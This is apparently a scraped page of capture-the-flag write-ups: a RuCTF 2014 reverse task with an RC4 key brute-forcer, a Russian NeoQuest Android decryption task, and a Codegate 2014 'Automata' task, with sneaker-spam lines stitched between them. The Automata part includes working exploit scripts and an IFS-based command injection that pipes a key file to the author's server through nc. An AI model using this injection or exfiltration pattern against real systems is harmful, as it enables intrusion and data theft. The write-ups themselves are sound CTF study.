  char pMaskedKey[11]; // [sp+30h] [bp-18h]@1
  char v10; // [sp+3Bh] [bp-Dh]@1
  int v11; // [sp+3Ch] [bp-Ch]@1
  int *v12; // [sp+40h] [bp-8h]@1
  char xorMaskConstant; // [sp+47h] [bp-1h]@1

  pCryptedFlag[22] = 69;
  pCryptedFlag[26] = 69;
  LOBYTE(v0) = -123;
  pCryptedFlag[0] = -54;
  pCryptedFlag[1] = -56;
  pCryptedFlag[2] = -57;
  pCryptedFlag[3] = 3;
  pCryptedFlag[4] = -4;
  pCryptedFlag[5] = 16;
  pCryptedFlag[6] = 40;
  pCryptedFlag[7] = 31;
  pCryptedFlag[8] = 122;
  pCryptedFlag[9] = 127;
  pCryptedFlag[10] = -116;
  pCryptedFlag[11] = -108;
  pCryptedFlag[12] = 46;
  pCryptedFlag[13] = -7;
  pCryptedFlag[14] = 105;
  pCryptedFlag[15] = 36;
  pCryptedFlag[16] = -97;
  pCryptedFlag[17] = 125;
  pCryptedFlag[18] = 39;
  pCryptedFlag[19] = -63;
  pCryptedFlag[20] = -60;
  pCryptedFlag[21] = 9;
  pCryptedFlag[23] = 127;
  pCryptedFlag[24] = 117;
  pCryptedFlag[25] = -18;
  pCryptedFlag[27] = -105;
  pCryptedFlag[28] = -115;
  pCryptedFlag[29] = -81;
  pCryptedFlag[30] = 121;
  pCryptedFlag[31] = 31;
  v8 = 0;
  pMaskedKey[0] = -122;
  pMaskedKey[1] = -34;
  pMaskedKey[2] = -102;
  pMaskedKey[3] = -8;
  pMaskedKey[4] = -33;
  pMaskedKey[5] = -11;
  pMaskedKey[6] = -123;
  pMaskedKey[7] = -23;
  pMaskedKey[8] = -35;
  pMaskedKey[9] = -123;
  pMaskedKey[10] = -17;
  v10 = 0;
  v11 = v0;
  v12 = &v5;
  xorMaskConstant = v6;
  v1 = v6;
  v2 = 0;
  do
  {
    pMaskedKey[v2] ^= v1;
    ++v2;
  }
  while ( v2 < 0xB );
  rc4Crypt(pMaskedKey, pArgv1);
  v3 = 0;
  while ( *(&pCryptedFlag[v3] + pArgv1 - pCryptedFlag) == pCryptedFlag[v3] )
  {
    ++v3;
    if ( v3 >= 32 )
      return 1;
  }
  return 0;
}

Because RC4_encrypt = RC4_decrypt we can just pass to function at address 0x401000 local buffer pCryptedFlag and recive the flag!.. But what about the encryption key? If you are using OllyDbg with Phantom plugin (or any other debugger or plugin which prevent setting flag PEB.BeingDebugged) then there is no reason to worry, the buffer will be successfully decrypted :)

Otherwise we can brute the value of xorMaskConstant (because all elements in array pMaskedKey are bigger then 128 (the higher bit is set), then the range is [128,255]). The code for brutting:

def KSA(key):
    keylength = len(key)
    S = range(256)
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % keylength]) % 256
        S[i], S[j] = S[j], S[i]  # swap
    return S

def PRGA(S):
    i = 0
    j = 0
    while True:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]  # swap
        K = S[(S[i] + S[j]) % 256]
        yield K

def RC4(key):
    S = KSA(key)
    return PRGA(S)


if __name__ == '__main__':
    CONST = 0xB6
    rc4_key_arr = [0x86, 0xDE, 154, 248, 223, 245, 133, 233, 221, 133, 239]
    flag_arr = [0xCA, 0xC8, 0xC7, 3,0xFC, 0x10, 0x28, 0x1F, 0x7A, 0x7F, 0x8C, 0x94, 0x2E, 0xF9, 0x69, 0x24, 0x9F, 0x7D, 0x27, 0xC1, 0xC4, 9,0x45,0x7F, 0x75, 0xEE, 0x45, 0x97, 0x8D, 0xAF, 0x79, 0x1F]

    for CONST in range(128,256):
        rc4_key = [el^CONST for el in rc4_key_arr]
        rc4_key_stream = RC4(rc4_key)
        flag = ''.join([chr(fl_el^rc4_key_stream.next()) for fl_el in flag_arr])
        if "RUCTF" in flag:
            print(hex(CONST)+" : "+''.join([chr(el) for el in rc4_key]) +" : "+flag)

Anyway you recive the flag: RUCTF_408f971883ccf6180eab2b3cf5

The second way. In my opinion the only intersting task in RE, I've solved during RuCTF Quals 2014 was PIN (revese 400). So the only reason why I have written this writeup is the orgnanizer's condition for participants of RuCTF Final 2014: we should give them writeups of all tasks we have solved. To make this writeup a bit more intresting I decided to write a full control flow of this executable, so let's start.

As it's shown higher IDA's Hex-Rays failed right after comparison of the lenght of input argument with 32. Let's see asm code

As you can see this instruction has been added there by post UPX and pre OEP code. Ok, so the developer wants to generate an exception and we should search for exception header.

Because this binary requires DLL msvcr90.dll which is standart CRT (C run-time) lib from Visual C++ 2008 Redistributable package we know two facts: 1) it's most likely use SEH & CRT's _try/_catch technique and 2) this executable has been developed in VS 2008:)

As you know, in CRT_try/_catch blocks passes to CRT's SEH handlers (usually _except_handler3 or _except_handler4) as aurguments (for more information you can see Igor Skochinsky's article "Compiler Internals: Exceptions and RTTI" from RECon 2012, avliable here). At the begging of _main function we can see next:

This means that there is only one _try/_catch block in _main function. Let's go to address 0x4012ac:

Ok, we have found where does function at address 0x4010d0 (as you remember, it checks input argument) called from. Now let's take a look into this function. Because we have already discussed everything except receiving of constant xorMaskConstant only this part of this function will be examined:

According to image higher we can see that local buffer pMaskedKey xored with constant PEB.BeingDebugged, which normally equal to 1 if debugger is active and 0 otherwise. But how it has happened that it equal to 0xB6?

The answer if TLS (thread local storage) callbacks.

As you know, these functions aimed to initialization of some C++ clases and runs before execution of code at EP. And I our case everything it does is just add to PEB.BeingDebugged 0xB6.

So variable xorMaskConstant should be equal to 0xB6, RC4 excryption key is "0h,NiC3_k3Y" and the flag is RUCTF_408f971883ccf6180eab2b3cf5.

Buy Kicks | adidas sold 1 million dollars today Enflame Release Date - raw amber nmd laces

NEOQUEST 2014 Quals - Hasta la vista

Dor1s — Tue, 04 Mar 2014 09:36:31 +0000

Category:

crypto

reverse

Event:

NeoQuest Quals 2014

Дано андроид приложение.

Распаковываем, декомпилим. Видим, что проверяется deviceId -> нет смысла запускать, т.к. будет работать только на одном устройстве.

Анализируем исходники, полученные с помощью декомпилятора:

1) Замечаем формирование ссылки и скачиваение файла с адреса вида:

String paramString1 = "http://hastalavistababy.ru/index.php";
String strTime  = Long.valueOf(System.currentTimeMillis() / 1000L).toString();
String paramQueryString = "cmd=1&time=" + strTime + "&command_name=download_image&path=neoquest_2014";

Таким образом, конечная ссылка для скачивания: paramString1 + "?" + paramQueryString, размер файла: 59,856 байт. Далее по коду видно, что происходит расшифрование скачанного файла, который кладется в бандл приложения.

2) Формирование ключа:

String key = md5("352276054393855" + "25001" + md5("neoquest_2014"));

3) Расшифрование:

byte[] paramArrayOfByte = key.substring(0, 16).getBytes();
SecretKeySpec localSecretKeySpec = new SecretKeySpec(paramArrayOfByte, "AES");
Cipher localCipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
localCipher.init(1, localSecretKeySpec);
localCipher.init(2, localSecretKeySpec);
byte[] arrayOfByte2 = localCipher.doFinal(arrayOfByte1);

4) В итоге получается картинка с ключом:

Ключ: 1a0d37c6878202010b617c58c3184bfe

Mysneakers | Air Jordan 1 Low White/Black-Midnight Navy For Sale – Fitforhealth

Automata

Triff — Mon, 24 Feb 2014 10:31:25 +0000

Category:

reverse

Event:

Codegate CTF Preliminary 2014

Task:

==========================================

OS : Ubuntu 13.10 x86

IP : 58.229.183.18 / TCP 8181

http://58.229.183.26/files/automata_7329666edefb3754ec91b7316e61bb7d

==========================================

Solution:

I've started with nc 58.229.183.18 8181 and recieved this conversation:

[=] Welcome to Automata System [=]

[*] Enter your command: abc

[*] Enter your code: 1234

[!] Wrong code

Server asks me a command and some code for this command. So i have to go deeper. I downloaded and reversed binary from link. After some digging, i've found function with code:

And vars' declaration:

I'm in function that recieves my command and code, i think sub_113B just prints something and sub_116C reads. Inside:

sub_113B:

Like i said, it's just send string to you,

and sub_116C:

It reads string, but it cuts your string after first occurrence of space, \t, \r, \n, ', ". Just keep it in the mind, and now go further.

Sub_1339:

This function generates 3 int numbers for string (for command in this case), and sum of all numbers is equal to 43. Go more further:

This part of main function checks code, which i send to server. For all bytes of a code it evaluates a number. A bit more detailed evaluation in assembler listing:

It converts byte of code to 0xFF or to 0x00, depends on highest bit, then adds byte of code to result, then cuts of high-word of result and substructs 0xFF or 0x00. I rewrite this evaluation in following code:

highest = 0x80 & code

if (highest)

mask = 0xFF

else

mask = 0x00

result = (mask+code) & 0x0F - mask

So if highest bit code's byte is zero, then result is just low-word of code's byte! It's main idea. As we can see above, the result of this evaluation is compared to 1,2 and 3. If it is equal to 1,2 or 3 corresponding value will be incremented, if it's not equal, then function sub_1229 is called:

And we get "Wrong code" message.. The easiest way is to use bytes 0x01, 0x02 and 0x03 in a code, and result of evaluation always will be 1,2 or 3.

Next part of main function:

If you return to begining, you'll see, that v13,v14,v15 lay sequentially in the memory,and v13 sent to sub_1339 as argument, that will recieve 3 int numbers, so v13,v14 and v15 will hold 3 numbers for command. And, as you can see, code for command must contain as many 0x01 bytes as first number of result of sub_1339, as many 0x02 bytes as second number and as many 0x03 bytes as third. Totally code consists of 43 bytes. For example: command = "ls", result of sub_1339: 18,17,8, so you you can send: "0x01"*18 + "0x02"*17 + "0x03"*8 + "\n" via python and get "Verifying your code" message. Below is python script generating code for any command:

#!/usr/bin/env python
from socket import create_connection
from time import sleep


def func(s):
    buf = 0
    for c in s[::-1]:
        buf = (37 * (buf + ord(c))) % 2**32
    v2 = buf % 17 + 1
    v3 = (buf & 0xF) + 1
    v1 = 43 - v2 - v3
    return v1, v2, v3


if __name__ == "__main__":

    command="ls"
    res = func(command)

    print res

    code = "\x01" * res[0]
    code += "\x02" * res[1]
    code += "\x03" * res[2]
    code += "\n"

    con = create_connection(('58.229.183.18', 8181))
    print con.recv(1024)
    print con.recv(1024)
    con.send(command)
    sleep(0.1)

    print con.recv(1024)
    con.send(code)
    sleep(0.1)

    print con.recv(1024)
    exit(0)

Bad news everyone. Verifying is only starting.. and what did all checks above?... But we have no choice, let's go further.

Next block of code repeats with some changes 8 times:

Program opens several pipes, binds it to numbers, forks itself, then child will looping forever and parent will close several pipes. Also parent gives some pipes for read to child (from 1 to 5 in each block), child calls 2 functions:

sub_11B:

This sub just prints a percents on screen. Child reads a number from pipe and prints it like a part of 43 in percents.

sub_127F:

This sub gets code, number and signal (will be discussed later) and 3 pipes to write. It checks byte of a code (like before with shifting), and sends incremented buffer to first pipe if byte's result is equal to 1, and etc. Sub checks only one byte of a code: code[buf]. And if buf == 43 child sends signal to parent.

So, each child reads numbers from pipes. Checks corresponding byte of code and write incremented number to a pipe (so next child process will check next byte of code). If code ends (buf==43) , child send signal to parent. There are two types of signal: 10 and 12. Childs form #0 to #6 will send signal 10 and child #7 will send 12. At the end of main function:

So parent set handlers for signal 10 and 12, sends buf to pipe (buf was set to 0 above) and then waiting for childs.

Handler's code:

sub_124E:

sub_1229: (you also can find it above)

If parent recieves signal 10, it prints "Registered" and execute command which we have sent to him. So, now we know what we must do:

1) Take a command ("ls" will be good)

2) Evaluate corresponding code for it

3) Find the code that will send signal 10 to parent.

We can perform first two steps, but for the third step we should analyze pipes network.

Just go through all block, carefully analyze all pipes..

When pipe is created, two.. "slots" are created for it. One for reading and one for writing. Slots get sequential handles: fd+1 is a reading slot for first pipe, fd+2 is a writing slot for first pipe, fd+3 is a reading slot for second pipe and so on. Parent process closing not whole pipe, but only some slots, so he can close slots fd+2 and fd+4, and next pipe will be mapped to fd+2 (reading) and fd+4(wrtinig).

In first block slots 1,3,5 were created for reading and 2,4,6 for writing. And slots 1,3,4,6 were given away to child #0 and then were closed. So next pipe will be mapped to 1,3 (read-wrtie). We should keep in mind all connections to recreate network. For example: slot with number connected with slot 6, that was given to child #0, so if someone will read it, he will read output of child #0. But after this block slot #6 is closed, so in next blocks slot #6 will have different meaning and would not be connected to slot #5.

When all blocks had been analyzed we created this table:

First row is a numbers of pipes. There are 20 different pipes. Second row is a read and write slots for each pipe. Next rows correspond to eight childs (c0..c7) and parent process (p). Numbers in cells correspond to numbers that are used in program to mapped slots (fd+1 = 1 and so on). So if in code you find, that child #2 reads fd+4, you can look in table, find row with name "c2", find number '4' in taht row, and then find write slot in corresponding pipe (marked with color) , and you will see, that child #1 writes into slot fd+6, which is connected to child's #2 slot fd+4.

Now we can build network scheme:

As you can see, last child, that will send bad signal, send numbers to itself, so it can easly get 43 and send bad signal to parent. So our code should never send numbers to child #7.

And tere is a list of trasitions between childs. They sorted by code's bytes evaluation result, so first transition occurs, when result is equal to 1, second, when equal to 2, etc:

And final version of the network:

We can start code with 0x01 and 0x2, and child #0 will send numbers to itself... but how we can handle 0x03 byte? There is cycle 1-2-3-5 in network ( send bytes 0x01, 0x02, 0x03, 0x03 for this cycle) and we must send 0x03 to leave child#0.

Idea of the attack is to burn all 0x03 in cylce above, by performing 0x01, 0x02, 0x03, 0x03 byte sequence. If number of 0x03 bytes is odd we will burn all 0x03 bytes (cos we have to send one 0x03 to leave child #0) if it is even, we should perform additional 0x01, 0x02, 0x03 sequence after. And we can burn all others 0x01 and 0x02 in child #0.

Let a - number of 0x01, b - 0x02 and c - 0x03. We have two attack sequence:

Even-case: "\x01"*(a-c/2) + "\x02"*(b-c/2) + "\x03" + "\x01\x02\x03\x03"*(c/2-1) + "\x01\x02\x03" + "\n"

Odd-case: "\x01"*(a-c/2) + "\x02"*(b-c/2) + "\x03" + "\x01\x02\x03\x03"*(c/2) + "\n"

There is one problem: if a or b is less than half of c, we will get error, but let's skip this problem now.

Finally i wrote this script, that can send a valid code to pass verification:

#!/usr/bin/env python
from socket import create_connection
from time import sleep


def func(s):
    buf = 0
    for c in s[::-1]:
        buf = (37 * (buf + ord(c))) % 2**32
    v2 = buf % 17 + 1
    v3 = (buf & 0xF) + 1
    v1 = 43 - v2 - v3
    return v1, v2, v3


if __name__ == "__main__":
    command="ls"
    res = func(command)
    print res

    con = create_connection(('58.229.183.18', 8181))
    print con.recv(1024)
    print con.recv(1024)
    con.send(command)
    sleep(0.1)

    a, b, c = res
    cc = c / 2
    print con.recv(1024)
    if c % 2 == 0:
        con.send("\x01"*(a-cc) + "\x02"*(b-cc) + "\x03" + "\x01\x02\x03\x03"*(cc-1) + "\x01\x02\x03" + "\n")
    else:
        con.send("\x01"*(a-cc) + "\x02"*(b-cc) + "\x03" + "\x01\x02\x03\x03"*(cc) + "\n")
    sleep(0.1)


    print con.recv(1024)
    while(1):
        sleep(1)
        ans = con.recv(1024)
        print ans
        if ans.find("[!]") != -1:
            exit(0)

This script results in "[!] Registered" message. So i'd sent "ls | nc myserver myport" command.. and recieved an wrong code error... Remember the function which recieves my commands.. this function will cut command on space symbol.. so server could not perform commands with spaces... at this point i was stucked and screwed up.. how to send "ls | nc myserver myport" without spaces, tabs, etc?

There is Internal Field Separator - IFS, if you set IFS to something, system will treat that symbol like separator.

So IFS=_; a = ls_-la; echo ${a} will performs "ls -la", cos '_' treats as separator (like space). And the command "IFS=_;a=ls;b=nc_myserver_myport;${a}|${b}" sends listing of a directory to myserver. There are two files: automata and key. The next command:

"IFS=_;a=cat_key;b=nc_myserver_myport;${a}|${b}"

returns: F4ILUrE_Is_N0T_an_O0PtI1On

Flag: F4ILUrE_Is_N0T_an_O0PtI1On

Sports News | Nike Air Max 270 - Deine Größe bis zu 70% günstiger

Attachments:

automata.py.txt